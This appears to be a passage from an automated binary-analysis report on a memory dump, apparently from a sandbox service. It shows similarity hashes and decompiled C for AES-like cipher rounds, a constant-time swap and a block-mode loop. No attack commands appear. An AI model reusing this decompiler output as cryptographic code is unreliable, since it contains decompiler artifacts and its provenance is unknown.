                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 821ecff688c03416aa1109f5fb434017c5529e2c05978037e75630978224ba5d
                                                              • Instruction ID: c28aeca85b357259e6ed2548071010fc6de8a1487aad55b98cc25d40625daa09
                                                              • Opcode Fuzzy Hash: 821ecff688c03416aa1109f5fb434017c5529e2c05978037e75630978224ba5d
                                                              • Instruction Fuzzy Hash: B671A275A08B009FD358DF2AC581A5BF7E1FFC8310F558A2EE69A87760D631E845CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9FF80, Relevance: .2, Instructions: 160COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 90%
                                                              			E00B9FF80(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi) {
				signed char _t100;
				signed int _t101;
				signed int _t106;
				signed int _t108;
				signed int _t110;
				unsigned int _t119;
				signed int _t120;
				unsigned int _t128;
				signed int _t153;
				signed int _t156;
				signed int* _t160;
				void* _t246;
				void* _t248;
				void* _t250;

				 *(_t250 + 0x14) = __edi;
				_t100 = __eax ^  *__edi;
				_t108 = __ebx ^ __edi[1];
				_t119 = __ecx ^ __edi[2];
				_t128 = __edx ^ __edi[3];
				 *((intOrPtr*)(_t250 + 0x18)) = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
				do {
					 *(_t250 + 4) =  *(_t246 + (_t100 & 0x000000ff) * 8) ^  *(_t246 + 3 + (_t128 & 0x000000ff) * 8) ^  *(_t246 + 2 + (_t119 >> 0x00000010 & 0x000000ff) * 8) ^  *(_t246 + 1 + (_t108 >> 0x18) * 8);
					 *(_t250 + 8) =  *(_t246 + (_t108 & 0x000000ff) * 8) ^  *(_t246 + 3 + (_t100 & 0x000000ff) * 8) ^  *(_t246 + 2 + (_t128 >> 0x00000010 & 0x000000ff) * 8) ^  *(_t246 + 1 + (_t119 >> 0x18) * 8);
					_t153 = _t108 & 0x000000ff;
					_t156 = _t100 >> 0x00000010 & 0x000000ff;
					_t120 = _t119 & 0x000000ff;
					_t110 = _t108 >> 0x00000010 & 0x000000ff;
					_t101 = _t100 >> 0x18;
					_t160 =  &(( *(_t250 + 0x14))[4]);
					_t100 =  *(_t250 + 4) ^  *_t160;
					_t108 =  *(_t250 + 8) ^ _t160[1];
					_t119 =  *(_t246 + (_t119 & 0x000000ff) * 8) ^  *(_t246 + 3 + _t153 * 8) ^  *(_t246 + 2 + _t156 * 8) ^  *(_t246 + 1 + (_t128 >> 0x18) * 8) ^ _t160[2];
					_t128 =  *(_t246 + (_t128 & 0x000000ff) * 8) ^  *(_t246 + 3 + _t120 * 8) ^  *(_t246 + 2 + _t110 * 8) ^  *(_t246 + 1 + _t101 * 8) ^ _t160[3];
					 *(_t250 + 0x14) = _t160;
				} while (_t160 <  *((intOrPtr*)(_t250 + 0x18)));
				_t248 = _t246 + 0x880 - 0x80;
				 *(_t250 + 4) =  *(_t248 + (_t100 & 0x000000ff)) & 0x000000ff ^ ( *(_t248 + (_t128 & 0x000000ff)) & 0x000000ff) << 0x00000008 ^ ( *(_t248 + (_t119 >> 0x00000010 & 0x000000ff)) & 0x000000ff) << 0x00000010 ^ ( *(_t248 + (_t108 >> 0x18)) & 0x000000ff) << 0x00000018;
				 *(_t250 + 8) =  *(_t248 + (_t108 & 0x000000ff)) & 0x000000ff ^ ( *(_t248 + (_t100 & 0x000000ff)) & 0x000000ff) << 0x00000008 ^ ( *(_t248 + (_t128 >> 0x00000010 & 0x000000ff)) & 0x000000ff) << 0x00000010 ^ ( *(_t248 + (_t119 >> 0x18)) & 0x000000ff) << 0x00000018;
				_t106 =  *(_t250 + 4);
				asm("adc [ebx], dh");
				_pop(es);
				return _t106;
			}

















                                                              0x00b9ff80
                                                              0x00b9ff84
                                                              0x00b9ff86
                                                              0x00b9ff89
                                                              0x00b9ff8c
                                                              0x00b9ff9c
                                                              0x00b9ffa0
                                                              0x00b9ffcb
                                                              0x00b9fffa
                                                              0x00ba000a
                                                              0x00ba0016
                                                              0x00ba0037
                                                              0x00ba0043
                                                              0x00ba0051
                                                              0x00ba005c
                                                              0x00ba005f
                                                              0x00ba0061
                                                              0x00ba0064
                                                              0x00ba0067
                                                              0x00ba006e
                                                              0x00ba006e
                                                              0x00ba0096
                                                              0x00ba00d7
                                                              0x00ba0119
                                                              0x00ba019d
                                                              0x00ba01a9
                                                              0x00ba01ab
                                                              0x00ba01b5

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40a998b215707fbddb308fd1f2a4123efc998ac43f72f41c2de7b8f5ed9dde9e
                                                              • Instruction ID: 109ac1c9b47ed5f56c29ebfcbbf3693180d26f2a509fa10325e4f52af5741e7f
                                                              • Opcode Fuzzy Hash: 40a998b215707fbddb308fd1f2a4123efc998ac43f72f41c2de7b8f5ed9dde9e
                                                              • Instruction Fuzzy Hash: 9C61A33390467B5BDB649E6DD8401A9F7A2BFC4320F5B8A75DC9823642C234EA11DBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9E6E1, Relevance: .2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3fb40114186b8bd38015c621e979a7392c83a08e63974a8c4c5d01ece18a9f7f
                                                              • Instruction ID: a83e972315d543328e525738509aa7b151221856e4c737ae7b6a3f3b4e0a8b4a
                                                              • Opcode Fuzzy Hash: 3fb40114186b8bd38015c621e979a7392c83a08e63974a8c4c5d01ece18a9f7f
                                                              • Instruction Fuzzy Hash: 4B51FD266257BA46DBC3CA2DC45047EB7E1BE89206B45055BDCD0F3281D73EDA09B7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9E8F0, Relevance: .2, Instructions: 152COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B9E8F0(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi, void* __ebp, signed int _a4, signed int _a8, signed int* _a20, intOrPtr _a24) {
				unsigned int _t114;
				signed int _t115;
				signed int _t123;
				signed int _t124;
				signed char _t134;
				signed int _t135;
				unsigned int _t143;
				signed int _t173;
				signed int* _t176;

				_a20 = __edi;
				_t114 = __eax ^  *__edi;
				_t123 = __ebx ^ __edi[1];
				_t134 = __ecx ^ __edi[2];
				_t143 = __edx ^ __edi[3];
				_a24 = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
				do {
					_a4 =  *(__ebp + (_t114 & 0x000000ff) * 8) ^  *(__ebp + 3 + (_t123 & 0x000000ff) * 8) ^  *(__ebp + 2 + (_t134 >> 0x00000010 & 0x000000ff) * 8) ^  *(__ebp + 1 + (_t143 >> 0x18) * 8);
					_t124 = _t123 >> 0x10;
					_a8 =  *(__ebp + (_t123 & 0x000000ff) * 8) ^  *(__ebp + 3 + (_t134 & 0x000000ff) * 8) ^  *(__ebp + 2 + (_t143 >> 0x00000010 & 0x000000ff) * 8) ^  *(__ebp + 1 + (_t114 >> 0x18) * 8);
					_t135 = _t134 >> 0x18;
					_t173 = _t114 >> 0x00000010 & 0x000000ff;
					_t115 = _t114 & 0x000000ff;
					_t176 =  &(_a20[4]);
					_t114 = _a4 ^  *_t176;
					_t123 = _a8 ^ _t176[1];
					_t134 =  *(__ebp + (_t134 & 0x000000ff) * 8) ^  *(__ebp + 3 + (_t143 & 0x000000ff) * 8) ^  *(__ebp + 2 + _t173 * 8) ^  *(__ebp + 1 + (_t124 & 0x000000ff) * 8) ^ _t176[2];
					_t143 =  *(__ebp + (_t143 & 0x000000ff) * 8) ^  *(__ebp + 3 + _t115 * 8) ^  *(__ebp + 2 + (_t124 & 0x000000ff) * 8) ^  *(__ebp + 1 + _t135 * 8) ^ _t176[3];
					_a20 = _t176;
				} while (_t176 < _a24);
				_a4 =  *(__ebp + 2 + (_t114 & 0x000000ff) * 8) & 0x000000ff ^  *(__ebp + (_t123 & 0x000000ff) * 8) & 0x0000ff00 ^  *(__ebp + (_t134 >> 0x00000010 & 0x000000ff) * 8) & 0x00ff0000 ^  *(__ebp + 2 + (_t143 >> 0x18) * 8) & 0xff000000;
				_a8 =  *(__ebp + 2 + (_t123 & 0x000000ff) * 8) & 0x000000ff ^  *(__ebp + (_t134 & 0x000000ff) * 8) & 0x0000ff00 ^  *(__ebp + (_t143 >> 0x00000010 & 0x000000ff) * 8) & 0x00ff0000 ^  *(__ebp + 2 + (_t114 >> 0x18) * 8) & 0xff000000;
				return _a4 ^ _a20[4];
			}












                                                              0x00b9e8f0
                                                              0x00b9e8f4
                                                              0x00b9e8f6
                                                              0x00b9e8f9
                                                              0x00b9e8fc
                                                              0x00b9e90c
                                                              0x00b9e910
                                                              0x00b9e93b
                                                              0x00b9e947
                                                              0x00b9e96d
                                                              0x00b9e979
                                                              0x00b9e992
                                                              0x00b9e9ab
                                                              0x00b9e9ca
                                                              0x00b9e9cd
                                                              0x00b9e9cf
                                                              0x00b9e9d2
                                                              0x00b9e9d5
                                                              0x00b9e9dc
                                                              0x00b9e9dc
                                                              0x00b9ea2f
                                                              0x00b9ea7f
                                                              0x00b9eb2b

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99376b587692ce240fa4f6e5ff9e9d674aa83cf96403c63a4b33a8538c00fd75
                                                              • Instruction ID: 102b137daa6fba2da2ca3e3e854234aa8e9d866c29ca9db7ac5edf3a86adada7
                                                              • Opcode Fuzzy Hash: 99376b587692ce240fa4f6e5ff9e9d674aa83cf96403c63a4b33a8538c00fd75
                                                              • Instruction Fuzzy Hash: B8618C3391262B9BDB61DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119AC4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9E6E0, Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42d113fb11f5d67af7d42cc83fe2ed468dff338936dc1334fd8bb1f7698a49c1
                                                              • Instruction ID: 8c52f17212864d8ac1c53b12d03c63bf6786c07348736049da2d6d6d0a82ac39
                                                              • Opcode Fuzzy Hash: 42d113fb11f5d67af7d42cc83fe2ed468dff338936dc1334fd8bb1f7698a49c1
                                                              • Instruction Fuzzy Hash: 9E510D266257BA46DBC3CA2DC45047EB7E1BE89106B45055BDCD0B3381C73DDA09B7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA6B80, Relevance: .1, Instructions: 145COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00BA6B80(intOrPtr _a4, signed int** _a8, signed int** _a12, intOrPtr _a16) {
				signed int** _t71;
				signed int* _t72;
				intOrPtr _t73;
				signed int _t83;
				signed int _t90;
				signed int _t93;
				signed int _t94;
				signed int _t134;
				signed int* _t135;
				signed int _t139;
				signed int _t140;
				signed int _t142;
				signed int _t170;
				signed int** _t172;
				signed int* _t173;

				_t71 = _a12;
				_t73 = _a16;
				_t172 = _a8;
				_t140 = _t172[1];
				_t90 = (_a4 - 1 >> 0x1f) - 1;
				_t93 = (_t71[1] ^ _t140) & _t90;
				_t172[1] = _t140 ^ _t93;
				_t71[1] = _t71[1] ^ _t93;
				_t94 = _t73 - 1;
				if(_t94 > 9) {
					_t142 = 0xa;
					if(_t73 > 0xa) {
						do {
							_t135 =  *_t172;
							_t83 = _t135[_t142];
							_t139 = (( *_t71)[_t142] ^ _t83) & _t90;
							_t135[_t142] = _t83 ^ _t139;
							( *_t71)[_t142] = ( *_t71)[_t142] ^ _t139;
							_t142 = _t142 + 1;
						} while (_t142 < _a16);
					}
					goto L6;
				} else {
					switch( *((intOrPtr*)(_t94 * 4 +  &M00BA6CDC))) {
						case 0:
							goto L15;
						case 1:
							L14:
							_t82 =  *_t172;
							_t167 = _t82[1];
							_t130 = (( *_t71)[1] ^ _t167) & _t90;
							_t82[1] = _t167 ^ _t130;
							( *_t71)[1] = ( *_t71)[1] ^ _t130;
							goto L15;
						case 2:
							L13:
							_t81 =  *_t172;
							_t164 = _t81[2];
							_t126 = (( *_t71)[2] ^ _t164) & _t90;
							_t81[2] = _t164 ^ _t126;
							( *_t71)[2] = ( *_t71)[2] ^ _t126;
							goto L14;
						case 3:
							L12:
							_t80 =  *_t172;
							_t161 = _t80[3];
							_t122 = (( *_t71)[3] ^ _t161) & _t90;
							_t80[3] = _t161 ^ _t122;
							( *_t71)[3] = ( *_t71)[3] ^ _t122;
							goto L13;
						case 4:
							L11:
							_t79 =  *_t172;
							_t158 = _t79[4];
							_t118 = (( *_t71)[4] ^ _t158) & _t90;
							_t79[4] = _t158 ^ _t118;
							( *_t71)[4] = ( *_t71)[4] ^ _t118;
							goto L12;
						case 5:
							L10:
							_t78 =  *_t172;
							_t155 = _t78[5];
							_t114 = (( *_t71)[5] ^ _t155) & _t90;
							_t78[5] = _t155 ^ _t114;
							( *_t71)[5] = ( *_t71)[5] ^ _t114;
							goto L11;
						case 6:
							L9:
							_t77 =  *_t172;
							_t152 = _t77[6];
							_t110 = (( *_t71)[6] ^ _t152) & _t90;
							_t77[6] = _t152 ^ _t110;
							( *_t71)[6] = ( *_t71)[6] ^ _t110;
							goto L10;
						case 7:
							L8:
							_t76 =  *_t172;
							_t149 = _t76[7];
							_t106 = (( *_t71)[7] ^ _t149) & _t90;
							_t76[7] = _t149 ^ _t106;
							( *_t71)[7] = ( *_t71)[7] ^ _t106;
							goto L9;
						case 8:
							L7:
							_t75 =  *_t172;
							_t146 = _t75[8];
							_t102 = (( *_t71)[8] ^ _t146) & _t90;
							_t75[8] = _t146 ^ _t102;
							( *_t71)[8] = ( *_t71)[8] ^ _t102;
							goto L8;
						case 9:
							L6:
							_t74 =  *_t172;
							_t143 = _t74[9];
							_t98 = (( *_t71)[9] ^ _t143) & _t90;
							_t74[9] = _t143 ^ _t98;
							( *_t71)[9] = ( *_t71)[9] ^ _t98;
							goto L7;
					}
				}
				L15:
				_t173 =  *_t172;
				_t170 =  *_t173;
				_t134 = ( *( *_t71) ^ _t170) & _t90;
				 *_t173 = _t170 ^ _t134;
				_t72 =  *_t71;
				 *_t72 =  *_t72 ^ _t134;
				return _t72;
			}


















                                                              0x00ba6b84
                                                              0x00ba6b8c
                                                              0x00ba6b91
                                                              0x00ba6b97
                                                              0x00ba6b9f
                                                              0x00ba6ba0
                                                              0x00ba6ba4
                                                              0x00ba6ba7
                                                              0x00ba6baa
                                                              0x00ba6bb0
                                                              0x00ba6bb9
                                                              0x00ba6bc0
                                                              0x00ba6bc3
                                                              0x00ba6bc3
                                                              0x00ba6bc5
                                                              0x00ba6bd2
                                                              0x00ba6bd6
                                                              0x00ba6bdb
                                                              0x00ba6be1
                                                              0x00ba6be2
                                                              0x00ba6be8
                                                              0x00000000
                                                              0x00ba6bb2
                                                              0x00ba6bb2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6ca9
                                                              0x00ba6ca9
                                                              0x00ba6cad
                                                              0x00ba6cb5
                                                              0x00ba6cb9
                                                              0x00ba6cbe
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c91
                                                              0x00ba6c91
                                                              0x00ba6c95
                                                              0x00ba6c9d
                                                              0x00ba6ca1
                                                              0x00ba6ca6
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c79
                                                              0x00ba6c79
                                                              0x00ba6c7d
                                                              0x00ba6c85
                                                              0x00ba6c89
                                                              0x00ba6c8e
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c61
                                                              0x00ba6c61
                                                              0x00ba6c65
                                                              0x00ba6c6d
                                                              0x00ba6c71
                                                              0x00ba6c76
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c49
                                                              0x00ba6c49
                                                              0x00ba6c4d
                                                              0x00ba6c55
                                                              0x00ba6c59
                                                              0x00ba6c5e
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c31
                                                              0x00ba6c31
                                                              0x00ba6c35
                                                              0x00ba6c3d
                                                              0x00ba6c41
                                                              0x00ba6c46
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c19
                                                              0x00ba6c19
                                                              0x00ba6c1d
                                                              0x00ba6c25
                                                              0x00ba6c29
                                                              0x00ba6c2e
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6c01
                                                              0x00ba6c01
                                                              0x00ba6c05
                                                              0x00ba6c0d
                                                              0x00ba6c11
                                                              0x00ba6c16
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6be9
                                                              0x00ba6be9
                                                              0x00ba6bed
                                                              0x00ba6bf5
                                                              0x00ba6bf9
                                                              0x00ba6bfe
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba6bb2
                                                              0x00ba6cc1
                                                              0x00ba6cc1
                                                              0x00ba6cc5
                                                              0x00ba6ccb
                                                              0x00ba6ccf
                                                              0x00ba6cd1
                                                              0x00ba6cd3
                                                              0x00ba6cd8

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b01e3de4bbd11fab696b551688293b66de8f0d720162844bc074d04e1013a08
                                                              • Instruction ID: 300affc0df856514f8407d8bd9ef85a3a4f838000f0f458e71b49a0d64cfe0bc
                                                              • Opcode Fuzzy Hash: 5b01e3de4bbd11fab696b551688293b66de8f0d720162844bc074d04e1013a08
                                                              • Instruction Fuzzy Hash: 83515076A05A018FD718CF1AC481946F7E3FFDD31072AC699C5999B32AD730F8429A94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9D9D9, Relevance: .1, Instructions: 134COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 32%
                                                              			E00B9D9D9(unsigned int __ebx, void* __ecx, void* __edx, signed int __edi, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, signed int _a56, signed int _a60, signed int _a64, signed int _a68, signed int _a84) {
				void* __esi;
				signed int* _t108;
				signed int* _t116;
				unsigned int _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				signed int _t140;
				signed int _t152;
				unsigned int _t164;
				intOrPtr _t173;
				signed int _t182;
				intOrPtr _t183;
				signed int _t185;
				intOrPtr _t186;
				intOrPtr* _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				void* _t202;

				_t182 = __edi;
				_t136 = __ebx;
				while(1) {
					L3:
					_a16 = _a16 + 1;
					_t140 = (_t164 << 0x00000020 | _t140) >> 1;
					_t164 = _t164 >> 1;
					if((_t140 & 0x00000001) == 0) {
						continue;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_push(_a16);
						_push(_t187);
						_t108 = E00B9D530();
						_t196 = _t195 + 8;
						if(_t108 == 0) {
							break;
						}
						 *(_t187 + 0x68) =  *(_t187 + 0x68) ^  *_t108;
						 *(_t187 + 0x6c) =  *(_t187 + 0x6c) ^ _t108[1];
						 *(_t187 + 0x70) =  *(_t187 + 0x70) ^ _t108[2];
						 *(_t187 + 0x74) =  *(_t187 + 0x74) ^ _t108[3];
						_t116 = (_t182 -  *((intOrPtr*)(_t187 + 0x48)) - 1 << 4) + _a20;
						_a36 =  *(_t187 + 0x68) ^  *_t116;
						_a40 =  *(_t187 + 0x6c) ^ _t116[1];
						_a44 = _t116[2] ^  *(_t187 + 0x70);
						_a48 = _t116[3] ^  *(_t187 + 0x74);
						 *((intOrPtr*)( *_t187))( &_a36,  &_a52,  *((intOrPtr*)(_t187 + 8)));
						 *(_t187 + 0x78) =  *(_t187 + 0x78) ^ _a52;
						 *(_t187 + 0x7c) =  *(_t187 + 0x7c) ^ _a56;
						 *(_t187 + 0x80) =  *(_t187 + 0x80) ^ _a60;
						 *(_t187 + 0x84) =  *(_t187 + 0x84) ^ _a64;
						_t192 = _a28;
						_t195 = _t196 + 0xc;
						_t182 = _t182 + 1;
						asm("adc ebx, 0x0");
						_t202 = _t136 - _t192;
						if(_t202 < 0 || _t202 <= 0 && _t182 <= _a24) {
							_t140 = _t182;
							_t164 = _t136;
							_a16 = 0;
							if((_t182 & 0x00000001) == 0) {
								do {
									goto L3;
								} while ((_t140 & 0x00000001) == 0);
							}
							continue;
						} else {
							_t152 = _a32;
							_t173 = _a24;
							_t185 = _a84 & 0x0000000f;
							if(_t185 > 0) {
								 *(_t187 + 0x6c) =  *(_t187 + 0x6c) ^  *(_t187 + 0x24);
								 *(_t187 + 0x68) =  *(_t187 + 0x68) ^  *(_t187 + 0x20);
								 *(_t187 + 0x74) =  *(_t187 + 0x74) ^  *(_t187 + 0x2c);
								 *(_t187 + 0x70) =  *(_t187 + 0x70) ^  *(_t187 + 0x28);
								_a36 = 0;
								_a40 = 0;
								_a44 = 0;
								_a48 = 0;
								E00C6B7A0(_t136, _t185, _t187,  &_a36, (_t152 << 4) + _a20, _t185);
								 *((char*)(_t195 + _t185 + 0x30)) = 0x80;
								_a52 =  *(_t187 + 0x68) ^ _a36;
								_a56 =  *(_t187 + 0x6c) ^ _a40;
								_a60 = _a44 ^  *(_t187 + 0x70);
								_a64 = _a48 ^  *(_t187 + 0x74);
								 *((intOrPtr*)( *_t187))( &_a52,  &_a36,  *((intOrPtr*)(_t187 + 8)));
								 *(_t187 + 0x78) =  *(_t187 + 0x78) ^ _a36;
								 *(_t187 + 0x7c) =  *(_t187 + 0x7c) ^ _a40;
								 *(_t187 + 0x80) =  *(_t187 + 0x80) ^ _a44;
								_t173 = _a24;
								_t195 = _t195 + 0x18;
								 *(_t187 + 0x84) =  *(_t187 + 0x84) ^ _a48;
							}
							_pop(_t186);
							 *((intOrPtr*)(_t187 + 0x4c)) = _t192;
							 *((intOrPtr*)(_t187 + 0x48)) = _t173;
							_pop(_t189);
							_pop(_t138);
							return E00C69C26(1, _t138, _a68 ^ _t195, _t173, _t186, _t189);
						}
						L13:
					}
					_pop(_t183);
					_pop(_t188);
					_pop(_t137);
					return E00C69C26(0, _t137, _a68 ^ _t196, _t164, _t183, _t188);
					goto L13;
					L3:
					_a16 = _a16 + 1;
					_t140 = (_t164 << 0x00000020 | _t140) >> 1;
					_t164 = _t164 >> 1;
				}
			}
























                                                              0x00b9d9d9
                                                              0x00b9d9d9
                                                              0x00b9d9e0
                                                              0x00b9d9e0
                                                              0x00b9d9e0
                                                              0x00b9d9e4
                                                              0x00b9d9ef
                                                              0x00b9d9f3
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9d9f5
                                                              0x00b9d9f5
                                                              0x00b9d9f9
                                                              0x00b9d9fa
                                                              0x00b9d9fb
                                                              0x00b9da00
                                                              0x00b9da05
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9da0d
                                                              0x00b9da13
                                                              0x00b9da19
                                                              0x00b9da1f
                                                              0x00b9da31
                                                              0x00b9da3a
                                                              0x00b9da3e
                                                              0x00b9da54
                                                              0x00b9da5c
                                                              0x00b9da66
                                                              0x00b9da6c
                                                              0x00b9da7b
                                                              0x00b9da7e
                                                              0x00b9da84
                                                              0x00b9da8a
                                                              0x00b9da8e
                                                              0x00b9da91
                                                              0x00b9da94
                                                              0x00b9da97
                                                              0x00b9da99
                                                              0x00b9d9c9
                                                              0x00b9d9cb
                                                              0x00b9d9cd
                                                              0x00b9d9d5
                                                              0x00b9d9e0
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9d9e0
                                                              0x00000000
                                                              0x00b9daab
                                                              0x00b9daab
                                                              0x00b9daaf
                                                              0x00b9dab7
                                                              0x00b9daba
                                                              0x00b9dac3
                                                              0x00b9dacc
                                                              0x00b9dacf
                                                              0x00b9dad5
                                                              0x00b9dae8
                                                              0x00b9daec
                                                              0x00b9daf0
                                                              0x00b9daf4
